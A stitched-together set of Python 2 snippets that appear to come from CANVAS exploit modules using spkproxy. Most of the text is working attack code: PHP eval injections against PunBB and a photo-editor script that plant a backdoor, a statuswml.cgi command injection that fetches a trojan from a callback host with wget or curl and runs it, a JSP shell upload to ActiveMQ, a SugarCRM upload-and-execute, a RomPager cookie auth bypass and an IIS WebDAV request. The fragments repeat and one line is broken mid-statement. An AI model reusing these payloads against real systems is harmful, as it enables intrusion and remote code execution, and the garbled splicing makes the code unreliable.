def setup_UA(self, url):
"""
Setup everything needed to do requests using spkproxy
"""
if self.auth_user and self.auth_password:
self.log("Using %s auth (User: %s - Password: %s)" %
(self.auth_type, self.auth_user, self.auth_password))
if self.auth_type == "BASIC":
auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
else: #NTLM
domain = ""
user = self.auth_user
if "\\" in self.auth_user:
domain, user = self.auth_user.split("\\")
print "domain =", domain, " - user="******"X-Vermeer-Content-Type",
"application/x-vermeer-urlencoded")
ua.addHeader("Content-Type", "application/x-vermeer-urlencoded")
return ua
def send_jboss_request(self, payload=None):
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.hostname, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self)
host_field = "%s:%s" % (self.hostname, self.port)
self.ua.addHeader("Host", host_field)
data = None
if payload != None:
data = self.ua.POST(self.targetpath, payload, extraheaders=None, noresponse=True)
else:
data = self.ua.GET(self.targetpath, noresponse=False)
return data
def send_initial_request(self):
auth = None
if self.basicauth:
logging.debug('Using basic auth {}:{}'.format(
self.basicauth_user, self.basicauth_password))
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
url = 'https' if self.https else 'http'
url += '://' + self.host
url += ':' + str(self.port)
url += self.path
url += '/CFIDE/wizards/common/utils.cfc'
postdata = 'method=verifyldapserver&vusername=&vpassword=&vserver='
postdata += self.ldap_ip
postdata += '&vport='
postdata += str(self.ldap_port)
postdata += '&vstart=ou%3dmosdef%2cdc%3dexample%2cdc%3dorg'
logging.info('Sending initial request')
ua = spkproxy.UserAgent(url,
exploit=self,
auth=auth,
hostname=self.host)
ua.addHeader("Content-Type", "application/x-www-form-urlencoded")
ua.POST("", postdata, [], noresponse=False)
logging.info('Sent')
def send_struts_request(self, header, testing=False):
protocol = "https" if self.ssl else "http"
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) if self.basicauth_user else None
host_name = self.host
if self.vhost:
host_name = self.vhost
host_string = ("%s:%d" % (self.host, self.port)) if self.port != 80 else host_name
target_string = "%s://%s" % (protocol, host_string)
logging.info("connecting to: %s" % (target_string))
self.ua = spkproxy.UserAgent(target_string, auth=auth, hostname=host_name, exploit=self)
for (key, value) in header.iteritems():
self.ua.addHeader(key, value)
self.ua.addHeader("Host", host_string)
self.ua.addHeader("Connection", "close")
self.ua.addHeader("Accept-Encoding","identity")
self.ua.addHeader("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")
kwargs = None
(response, response_code) = (None, None)
descriptor = self.ua.GET("/%s" % (self.basepath), noresponse=True)
return descriptor
def test_vuln(self, vhosts):
if self.ssl:
protocol = "https"
else:
protocol = "http"
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
request = self.basepath + '?-s'
ret = []
for host in vhosts:
try:
data = spkproxy.urlopen(protocol + '://' + self.host +
":%s" % self.port + request,
hostname=host,
exploit=self,
auth=auth).read()
if data.lower().startswith("<code>"): ret.append(host)
except Exception:
import traceback
self.log(traceback.format_exc(5))
return ret
def deploy_war(self):
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
target = '%s/management/domain/applications/application' % self.url
ua = spkproxy.UserAgent(target, auth=auth, exploit=self)
ua.addHeader('Accept', 'application/json')
ua.addHeader('X-Requested-By', 'dummy')
data = "id=%s&force=true" % self.pathwar
response = ua.POST("", data)
return response
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))
if self.version==0:
ret=self.test()
if not ret:
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d"%(self.host,self.port))
self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol="https"
else:
protocol="http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth=None
UA=spkproxy.UserAgent(protocol+"://"+self.host+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)
if self.command:
self.log("Command: %s"%self.command)
command=self.command
command="print(startz);passthru('"+command+"');print(endz);"
data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;")
data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command)))
if "startz" in data:
result=data.split("startz")[1].split("endz")[0]
#self.log("Command data: %s"%prettyprint(data))
self.log("Command result=%s"%prettyprint(result))
ret=1
else:
self.log("Command not run - service patched?!")
else:
command=self.get_php_to_mosdef().strip()
command=command.replace("/","`pwd|cut -b1`")
self.log("Command: %s"%command)
self.log("Sending Exploit")
data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;")
data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command)))
self.log("Data=%s"%data)
self.log("Looking for PHP connectback")
ret=self.ISucceeded()
if ret:
self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
return ret
def check(self):
"""
Quicky banner check - looks for RomPager version.
"""
self.getargs()
self.log("Using basepath=%s" % self.basepath)
self.log("Using vhost=%s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
for hostname in self.allhosts:
self.log("Testing hostname: %s" % hostname)
self.log("Testing for RomPager version")
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
#setting up spkproxy
fd = spkproxy.urlopen(protocol + "://" + self.host +
":%s" % self.port + "/Allegro",
hostname=hostname,
exploit=self,
auth=auth)
data = fd.read()
#now that we have the web page - we parse it and look for vulnerable versions
#versions below 4.34 are assumed vulnerable.
for s in ["RomPager Advanced Version 4.07"]:
if s in data:
self.log_info(
"Detected vulnerable and supported RomPager version on %s "
% (hostname))
#self.argsDict["basepath"]=basepath
#self.basepath=basepath
self.hostname = hostname
self.version = 1
#self.log_debug("Response:%s"%data)
return 1
else:
for s in ["RomPager"]:
if s in data:
self.log_info(
"Unsupported version of RomPager was detected."
)
self.log_debug("Response: %s" % data)
return 0
else:
self.log_info("Target is not running RomPager.")
#self.log_debug("Response: %s"%data)
return 0
return 0
def get_jenkins_info(self):
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.hostname, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + self.basepath
host_field = "%s:%s" % (self.hostname, self.port)
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
self.ua.addHeader("Host", host_field)
(response, response_code) = self.ua.GET(self.targetpath,
noresponse=False,
entireresponse=True,
return_response_code=True)
version = self.extract_regex_result(response, self.version_re,
"version")
if self.version_test(version):
return_value = None
if 299 < response_code or response_code < 200:
pass
else:
for line in response.split("\r\n"):
if "X-Jenkins-CLI-Port" in line:
field = line.split(":")
return_value = int(field[1])
break
return return_value
else:
return None
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))
if self.version==0:
ret=self.test()
if not ret:
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d"%(self.host,self.port))
self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol="https"
else:
protocol="http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth=None
UA=spkproxy.UserAgent(protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)
if self.command:
self.log("Command: %s"%self.command)
command=self.command
command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip()
data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command)))
if "---1243---" in data:
result=data.split("1243---")[1].split("---3421")[0]
self.log("Command data: %s"%prettyprint(data))
self.log("Command result=%s"%prettyprint(result))
ret=1
else:
self.log("Command not run - service patched?!")
else:
command=self.get_php_to_mosdef().strip()
command=command.replace("/","`pwd|cut -b1`")
self.log("Command: %s"%command)
data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command)))
self.log("Looking for PHP connectback")
ret=self.ISucceeded()
if ret:
self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
return ret
def setup_UA(self, url=""):
"""
Setup everything needed to do requests using spkproxy
"""
#If we have to do basic-auth, let's get an object from spkproxy here
if self.username and self.password:
auth = spkproxy.BasicAuth(self.username, self.password)
self.log("Using BasicAuth (User: %s - Password: %s)" % (self.username, self.password))
else:
auth = None
ua = spkproxy.UserAgent(url, auth=auth, hostname=self.host, exploit=self)
return ua
def test(self):
"""
Quicky banner check - looks for comon basepaths
"""
self.getargs()
self.log("Using basepath=%s" % self.basepath)
self.log("Using vhost=%s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
for hostname in self.allhosts:
self.log("Testing hostname: %s" % hostname)
#automatically check out some common basepaths, starting with the one specified
for basepath in [
self.basepath, "/punn/upload/", "/punbb/", "/PunBB/",
"/board/", "/forum/", "/upload/", "/"
]:
self.log("Testing for basepath: %s" % basepath)
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
#this is the main call that does the magic here...
fd = spkproxy.urlopen(protocol + "://" + self.host +
':%s' % self.port + "/" + basepath,
hostname=hostname,
exploit=self,
auth=auth)
data = fd.read()
#now that we have the web page - we parse it and look for vulnerable versions
#list of vulnerable versions so far
for s in ["PunBB"]:
#self.log("Data=%s"%data) #print out web page (big)
if s in data:
self.log(
"Found Potential vulnerable PunBB in vhost %s at basepath %s"
% (hostname, basepath))
self.argsDict["basepath"] = basepath
self.basepath = basepath
self.hostname = hostname
self.version = 1
return 1
return 0
def setup_UA(self):
"""
Setup everything needed to do requests using spkproxy
"""
if self.basicauth_user and self.basicauth_password:
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
logging.info("Using BasicAuth (User: %s - Password: %s)" % (self.basicauth_user, self.basicauth_password))
else:
auth = None
ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self)
#ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self, proxyhost="localhost", proxyport=8080)
return ua
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.hostname,self.port))
self.log("Attacking %s:%d"%(self.hostname,self.port))
self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol="https"
else:
protocol="http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user !="":
auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth=None
useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath
self.log("useragentstring: %s"%useragentstring)
UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
t = threading.Thread(target=self.set_up_webserver)
t.setDaemon(True)
t.start()
response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;wget%%20-O%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False)
response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True)
time.sleep(5)
if self.ISucceeded():
self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
return 1
else:
print "wget attempt failed - retrying with curl"
response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;curl%%20-o%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False)
response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True)
time.sleep(5)
if self.ISucceeded():
self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
return 1
else:
self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
return 0
def setup_UA(self, url):
"""
Setup everything needed to do requests using spkproxy
"""
if self.basicauth_user and self.basicauth_password:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
self.log("Using BasicAuth (User: %s - Password: %s)" %
(self.basicauth_user, self.basicauth_password))
else:
auth = None
ua = spkproxy.UserAgent(url,
auth=auth,
hostname=self.hostname,
exploit=self)
return ua
def test(self):
"""
Quicky banner check - looks for comon basepaths
"""
self.getargs()
self.log("Using basepath=%s"%self.basepath)
self.log("Using vhost=%s"%self.hostname)
self.log("Using Testfile=%s"%self.testfile)
if self.ssl:
protocol = "https"
else:
protocol = "http"
for hostname in self.allhosts:
self.log("Testing hostname: %s"%hostname)
#automatically check out some common basepaths, starting with the one specified
for basepath in self.basepaths:
self.log("Testing for basepath: %s"%basepath)
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth = None
#this is the main call that does the magic here...
fd = spkproxy.urlopen(protocol+"://"+self.host+':%s'%self.port+basepath+self.testfile, hostname=hostname, exploit=self, auth=auth, extraheaders=[("User-Agent","Mozilla/4.0 (compatible; MSIE 5.0; Windows NT;)")])
data = fd.read()
#now that we have the web page - we parse it and look for vulnerable versions
#list of vulnerable versions so far
for s in self.foundstrings:
devlog("phpexploit","Data=%s"%data) #print out web page (big)
if s in data:
self.log("Found Potential vulnerable php app in vhost %s at basepath %s"%(hostname, basepath))
self.argsDict["basepath"] = basepath
self.basepath = basepath
self.hostname = hostname
self.version = 1
return 1
return 0
def setup_UA(self):
self.getargs()
if self.ssl:
protocol="https"
else:
protocol="http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user !="":
auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth=None
useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"
self.log("useragentstring: %s"%useragentstring)
self.UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
def test(self):
self.getargs()
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.hostname, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + self.basepath
host_field = "%s:%s" % (self.hostname, self.port)
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
self.ua.addHeader("Host", host_field)
(response, response_code) = self.ua.GET(self.targetpath,
noresponse=False,
entireresponse=True,
return_response_code=True)
version = self.extract_regex_result(response, self.version_re,
"version")
return self.version_test(version)
def send_request(self, data, no_response=True):
auth = None
req_header = spkproxy.header()
req_header.connectHost = self.target.interface
req_header.connectPort = self.port
req_header.URL = "/"
req_header.verb = "PROPFIND"
req_header.addHeader("Content-Length", "0")
req_header.addHeader("Host", self.host)
req_header.addHeader("If", data)
req_header.setSurpressContentLength()
req_body = spkproxy.body()
ntlm_info = ["","",""] #NTLM user / password / domain
proxy_info = ["", 0, "", 0]
if self.auth_type == "basic":
auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
auth.getHeader(req_header)
elif self.auth_type == "ntlm":
ntlm_info = [self.auth_user, self.auth_password, self.auth_domain]
if self.proxy_port is not None:
proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port]
con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info)
con.gettcpsock = self.gettcpsock
if self.ssl:
con.clientisSSL = 1
if no_response:
con.sendRequest(req_header, req_body, noresponse=no_response)
else:
x = con.sendRequest(req_header, req_body, noresponse=no_response)
return x
def test(self):
self.getargs()
auth = None
req_header = spkproxy.header()
req_header.connectHost = self.target.interface
req_header.connectPort = self.port
req_header.URL = "/"
req_header.verb = "OPTIONS"
req_header.addHeader("Host", self.host)
req_body = spkproxy.body()
ntlm_info = ["","",""] #NTLM user / password / domain
proxy_info = ["", 0, "", 0]
if self.auth_type == "basic":
auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
auth.getHeader(req_header)
elif self.auth_type == "ntlm":
ntlm_info = [self.auth_user, self.auth_password, self.auth_domain]
if self.proxy_port is not None:
proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port]
con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info)
con.gettcpsock = self.gettcpsock
if self.ssl:
con.clientisSSL = 1
logging.info("sending header request")
response = con.sendRequest(req_header, req_body, noresponse=False)
if isinstance(response, str):
return int("Server: Microsoft-IIS/6.0" in response and "MS-Author-Via: DAV" in response)
else:
return 0
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#port=self.port
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
#UA=spkproxy.UserAgent(protocol+"://"+self.host+":8088/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)
UA = spkproxy.UserAgent(protocol + "://" + self.host +
":%s" % self.port + "/" + self.basepath,
auth=auth,
hostname=self.hostname,
exploit=self)
data = UA.GET("%s%s%%00.txt" % (self.basepath, self.command))
self.log("Source=%s" % data)
#ret=self.ISucceeded()
#
#if ret:
# self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
#else:
# self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
#return ret
self.log("Check CANVAS log in next tab for page source")
def setup_UA(self, url="", add_trail_slash=False):
"""
Setup everything needed to do requests using spkproxy
"""
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user and self.basicauth_password:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
self.log("Using BasicAuth (User: %s - Password: %s)" %
(self.basicauth_user, self.basicauth_password))
else:
auth = None
self.log("HtmlAdaptor servlet url: %s" % self.htmladaptor_url)
if not url:
url = self.htmladaptor_url + "/" if add_trail_slash else self.htmladaptor_url
self.log("Setting spkproxy.UserAgent with url: %s" % url)
ua = spkproxy.UserAgent(url,
auth=auth,
hostname=self.hostname,
exploit=self)
return ua
def send_activemq_request(self):
if not self.hostname:
self.hostname = self.host
self.log('[D2] Attacking %s:%d' % (self.hostname, self.port))
self.log('[D2] Basic Auth User: %s' % self.basicauth_user)
self.log('[D2] VHost: %s' % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
# directory traversal
self.log('[D2] Exploit Directory Traversal Vulnerability')
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_pass)
host_field = "%s:%s" % (self.hostname, self.port)
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + self.basepath
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
self.ua.addHeader("Host", host_field)
data = open(self.filejsp, 'r').read()
self.ua.PUT('', data, noresponse=True)
# request mosdef jsp script
self.log('[D2] Request uploaded mosdef JSP script')
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + '/admin/d2.jsp'
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
self.ua.addHeader("Host", host_field)
data = self.ua.GET('')
def test(self):
self.getargs()
if not self.hostname:
self.hostname = self.host
self.log("Checking %s:%d" % (self.hostname, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
targetstring = "https://" + self.hostname + ":" + str(
self.port) + "/vco/api/about"
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
host_field = "%s:%s" % (self.hostname, self.port)
self.ua.addHeader("host", host_field)
data = None
data = self.ua.GET(self.targetpath, noresponse=False)
self.log("got response:%s from /vco/api/about" % data)
data = json.loads(data)
version_string = self.extract_regex_result(data["version"],
self.version_re, "version")
return int(version_string <= "6.0.1.2490144")
def is_vulnerable(self):
status = False
if self.basicauth_user:
self.auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
else:
self.auth = None
if self.cookies:
self.extraheaders = [("Cookie", self.cookies)]
#Test GET request
tag = "RENDER-TEST-INJECTION"
param_name = self.param + "[inline]"
params = { param_name : tag }
if self.moreparams:
params = self.add_params(params, self.moreparams)
urlencoded_params = urllib.urlencode(params)
request = self.basepath + "?" + urlencoded_params
target = self.host
if self.vhost:
target = self.vhost
url = self.protocol + '://' + target + ":%s" % self.port + request
(res, responsecode) = spkproxy.urlopen(url, extraheaders=self.extraheaders, data="", exploit=self, entireresponse=True, return_response_code=True, auth=self.auth,verb="GET")
response = res.read()
if responsecode == 200 :
if tag in response:
status = True
self.vulnerable_target = target
if responsecode == 401 :
if "WWW-Authenticate: Basic realm" in response:
raise ValueError("Authentication Failed - Basic Realm detected: check username & password and try it again")
else:
raise ValueError("Authentication Failed - Not Basic Realm")
return status
def do_url_connect(self, host_info, proxy=None):
""" do basic http auth if needed .. connect to url """
# ssl flag toggles to https
if host_info['ssl']:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if host_info['user']:
auth = spkproxy.BasicAuth(host_info['user'], host_info['password'])
else:
auth = None
if not proxy:
UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \
auth=auth, hostname=host_info['hostname'], exploit=self)
else:
self.log("Using web proxy: %s" % proxy)
UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \
auth=auth, hostname=host_info['hostname'], exploit=self, \
proxyhost=proxy.split(':')[0], proxyport=int(proxy.split(':')[1]))
return UA
def run(self):
self.getargs()
test = self.test()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.hostname, self.port))
self.log("Attacking %s:%d" % (self.hostname, self.port))
#self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user != "":
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
self.log("useragentstring: %s" % useragentstring)
UA = spkproxy.UserAgent(useragentstring,
auth=auth,
hostname=self.hostname,
exploit=self)
response = UA.POST(
self.loginpage,
"module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++"
% (self.username, self.password),
noresponse=False)
#self.log("AFTER LOGIN %s"%response)
#if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid
#if "action=SetTimezone" in response:
#self.log("setting time zone for %s"%self.username)
response = UA.POST(
self.timezonepage,
"record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++"
)
#self.log(response)
#find out what are assigned userid is
#<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived">
#not very pretty - but it works!
response = UA.GET(self.composemailpage)
#self.log(response)
try:
userid = response.split("assigned_user_id=")[1].split("&")[0]
self.log("Assigned User-Id: %s" % userid)
except:
self.log(
"Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!"
)
return 0
#push our file up
UA.addHeader(
"Content-Type",
"multipart/form-data; boundary=---------------------------3922242971797626524322043819"
)
response = UA.POST(self.composemailpage, self.getfile())
#self.log(response)
#{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"}
try:
prefix = response.split(",")[0].split(":")[1].strip("\"")
ourphpfilename = prefix + ".php"
self.log("our remote filename: %s" % ourphpfilename)
except:
self.log(
"Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!"
)
return 0
ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename
self.log("Path to our file: %s" % ourfile)
#execute our file!
UA.clearHeaders()
response = UA.GET(ourfile, noresponse=True)
for i in xrange(0, 3): #wait three seconds for callback
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
for node in self.argsDict['passednodes']:
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log_info("Using version: %s" % self.version)
ret = self.check()
self.setProgress(30)
if not ret:
self.setInfo(
"%s against %s:%d (failed: didn't find vulnerable target!)"
% (NAME, self.host, self.port))
self.log_info("Testing didn't find vulnerable target")
return 0
self.log_info("Attacking %s:%d" % (self.host, self.port))
#self.log("Basic Auth User: %s"%self.basicauth_user)
#self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath
self.log("RequestString: %s" % requestString)
UA = spkproxy.UserAgent(requestString,
auth=auth,
hostname=self.hostname,
exploit=self)
UA.SetCookie(
self.magicCookie_name,
self.magicCookie_val) # to clear the authentigation flag.
self.log("Cookie: " + self.magicCookie_name + "=" +
self.magicCookie_val)
self.setProgress(50)
# To-do: Handle enable/disable separatedly
#
#UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag.
#self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val)
data = UA.GET("")
self.setProgress(70)
if "status/status_deviceinfo" in data:
self.log("Authentication successfully disabled!")
self.log("You can now access web interface without password.")
self.setProgress(100)
ret = 1
else:
if "Protected Object" in data:
self.log("Exploit did not work. Wrong offsets?")
ret = 0
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(self.name, self.host, self.port))
self.log("Using version: %s" % self.version)
if self.version == 0:
ret = self.test()
if not ret:
self.setInfo(
"%s against %s:%d (failed: didn't find vulnerable target!)"
% (self.name, self.host, self.port))
self.log("Testing didn't find vulnerable target")
return 0
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(
self.port) + self.basepath
self.log("Targetstring: %s" % targetstring)
self.ua = spkproxy.UserAgent(targetstring,
auth=auth,
hostname=self.hostname,
exploit=self)
if hasattr(self, "content_type"):
self.ua.addHeader("Content-Type", self.content_type)
if self.webserverport:
self.set_up_webserver()
noresponse = True
noresponse = True
if self.command:
#we do get the response if we are sending it a command
noresponse = False
if self.verb == "POST":
body = self.getbody()
self.log("POSTING data of length %s" % len(body))
data = self.ua.POST(
self.targetpath, body, noresponse=noresponse
) #fix noresponce in POST noresponse=noresponse
elif self.verb == "GET":
data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(),
noresponse=noresponse)
if self.command and data:
blah = self.parse_command_response(data)
